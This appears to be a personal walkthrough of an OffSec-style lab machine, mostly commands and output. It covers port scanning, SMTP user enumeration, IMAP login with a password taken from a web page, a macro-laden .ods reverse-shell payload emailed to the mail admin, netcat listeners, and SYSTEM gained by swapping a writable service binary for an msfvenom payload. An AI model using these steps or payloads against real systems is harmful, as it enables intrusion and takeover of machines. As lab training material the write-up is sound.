$ sudo nmap -sCV -p- -v -Pn --open 192.168.145.140 > Hepet.txt
PORT      STATE SERVICE        VERSION
25/tcp    open  smtp           Mercury/32 smtpd (Mail server account Maiser)
| smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME, SIZE 0, HELP
|_ Recognized SMTP commands are: HELO EHLO MAIL RCPT DATA RSET AUTH NOOP QUIT HELP VRFY SOML Mail server account is 'Maiser'.
79/tcp    open  finger         Mercury/32 fingerd
| finger: Login: Admin         Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp   open  ph-addressbook Mercury/32 PH addressbook server
106/tcp   open  pop3pw         Mercury/32 poppass service
110/tcp   open  pop3           Mercury/32 pop3d
|_pop3-capabilities: TOP UIDL APOP EXPIRE(NEVER) USER
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
143/tcp   open  imap           Mercury/32 imapd 4.62
|_imap-capabilities: OK complete AUTH=PLAIN CAPABILITY X-MERCURY-1A0001 IMAP4rev1
443/tcp   open  ssl/http       Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
| tls-alpn: 
|_  http/1.1
| http-methods: 
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_ssl-date: TLS randomness does not represent time
|_http-title: Time Travel Company Page
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:     a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1:   b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
|_SHA-256: 0169 7338 0c0f 1df0 0bd9 593e d8d5 efa3 706c d6df 7993 f614 1272 b805 22ac dd23
445/tcp   open  microsoft-ds?
2224/tcp  open  http           Mercury/32 httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Mercury HTTP Services
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8000/tcp  open  http           Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-open-proxy: Proxy might be redirecting requests
| http-methods: 
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_http-title: Time Travel Company Page
11100/tcp open  vnc            VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    Unknown security type (40)
20001/tcp open  ftp            FileZilla ftpd 0.9.41 beta
|_ftp-bounce: bounce working!
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp            312 Oct 20  2020 .babelrc
| -r--r--r-- 1 ftp ftp            147 Oct 20  2020 .editorconfig
| -r--r--r-- 1 ftp ftp             23 Oct 20  2020 .eslintignore
| -r--r--r-- 1 ftp ftp            779 Oct 20  2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp            167 Oct 20  2020 .gitignore
| -r--r--r-- 1 ftp ftp            228 Oct 20  2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp            346 Oct 20  2020 .tern-project
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 build
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 config
| -r--r--r-- 1 ftp ftp           1376 Oct 20  2020 index.html
| -r--r--r-- 1 ftp ftp         425010 Oct 20  2020 package-lock.json
| -r--r--r-- 1 ftp ftp           2454 Oct 20  2020 package.json
| -r--r--r-- 1 ftp ftp           1100 Oct 20  2020 README.md
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 src
| drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 static
|_-r--r--r-- 1 ftp ftp            127 Oct 20  2020 _redirects
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
33006/tcp open  mysql          MariaDB 10.3.24 or later (unauthorized)
49664/tcp open  msrpc          Microsoft Windows RPC
49665/tcp open  msrpc          Microsoft Windows RPC
49666/tcp open  msrpc          Microsoft Windows RPC
49667/tcp open  msrpc          Microsoft Windows RPC
49668/tcp open  msrpc          Microsoft Windows RPC
49669/tcp open  msrpc          Microsoft Windows RPC
Service Info: Host: localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-05-08T07:12:35
|_  start_date: N/A


$ smtp-user-enum -t 192.168.145.140 -M VRFY -U /usr/share/wordlists/wfuzz/others/names.txt
192.168.145.140: Admin exists
192.168.145.140: Agnes exists
192.168.145.140: Charlotte exists
192.168.145.140: Martha exists

http://192.168.145.140:8000/  in webpage found some username:
Ela
Charlotte
Magnus
Agnes
Jonas
Martha

and Jonas K. description is SicMundusCreatusEst
Try credential jonas:SicMundusCreatusEst
$ nc -nv 192.168.145.140 143
(UNKNOWN) [192.168.145.140] 143 (imap2) open
* OK localhost IMAP4rev1 Mercury/32 v4.62 server ready.
tag login jonas@localhost SicMundusCreatusEst
tag OK LOGIN completed.
tag LIST "" "*"
* LIST (\NoInferiors) "/" INBOX
tag OK LIST completed.
tag SELECT INBOX
* 5 EXISTS
* 0 RECENT
# have no idea how this work, just follow walkthrough and look like can get in to a mail system, found have 5 emails and use below command to fetch email information.
tag fetch 5 BODY[HEADER] BODY[1]

or telnet 192.168.145.140 143
a1 login "jonas" "SicMundusCreatusEst"
a1 list "" *
a1 select INBOX
a1 fetch 1 body[text]
## Have no idea yet. Just know from emails that need to upload a spreadsheet macro then the mail server will execute it. So follow https://github.com/0bfxgh0st/MMG-LO/ to learn.

(alan㉿kali)-[~/offseclabs/MMG-LO]
└─$ python3 mmg-ods.py windows 192.168.45.233 4444
[+] Payload: windows reverse shell
[+] Creating malicious .ods file
Done

$ sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.145.140:25 -u 'Your spreadsheet' -m 'Here is your requested spreadsheet' -a file.ods
May 08 16:37:02 kali sendemail[1486619]: Email was sent successfully!

## OR use below cmd to sendout email with payload. Need wait few minutes for the mail server to process the spreadsheet. But somehow it only works one time for first file upload.
$ sudo swaks -t mailadmin@localhost --from jonas@localhost --attach file.ods --server 192.168.145.140 --body "Please open this ODT document." --header "Poop File" --suppress-data
=== Trying 192.168.145.140:25...
=== Connected to 192.168.145.140.
<-  220 localhost ESMTP server ready.
 -> EHLO kali
<-  250-localhost Hello kali; ESMTPs are:
<-  250-TIME
<-  250-SIZE 0
<-  250 HELP
 -> MAIL FROM:<jonas@localhost>
<-  250 Sender OK - send RCPTs.
 -> RCPT TO:<mailadmin@localhost>
<-  250 Recipient OK - send RCPT or DATA.
 -> DATA
<-  354 OK, send data, end with CRLF.CRLF
 -> 205 lines sent
<-  250 Data received OK.
 -> QUIT
<-  221 localhost Service closing channel.
=== Connection closed with remote host.

$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.145.140] 50493
whoami
hepet\ela arwel

whoami /priv
SeShutdownPrivilege           Shut down the system

Upload winPEASany.exe and found
Ela Arwel:LadderWheelGallon443
VeyonService(Veyon Solutions - Veyon Service)[C:\Users\Ela Arwel\Veyon\veyon-service.exe] - Auto - Running - No quotes and Space detected                                       
    File Permissions: Ela Arwel [Allow: AllAccess]
    Possible DLL Hijacking in binary folder: C:\Users\Ela Arwel\Veyon (Ela Arwel [Allow: AllAccess]

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object { $_.State -eq "Running" } | Format-Table -AutoSize
VeyonService           Running C:\Users\Ela Arwel\Veyon\veyon-service.exe

PS C:\Users\Ela Arwel\Veyon> icacls veyon-service.exe
veyon-service.exe NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Administrators:(I)(F)
                  HEPET\Ela Arwel:(I)(F)
msfvenom veyon-service.exe
mv veyon-service.exe veyon-service.bak
upload veyon-service.exe from Kali.
PS C:\Users\Ela Arwel\Veyon> shutdown /r /t 0

$ rlwrap nc -nlvp 4445
listening on [any] 4445 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.145.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

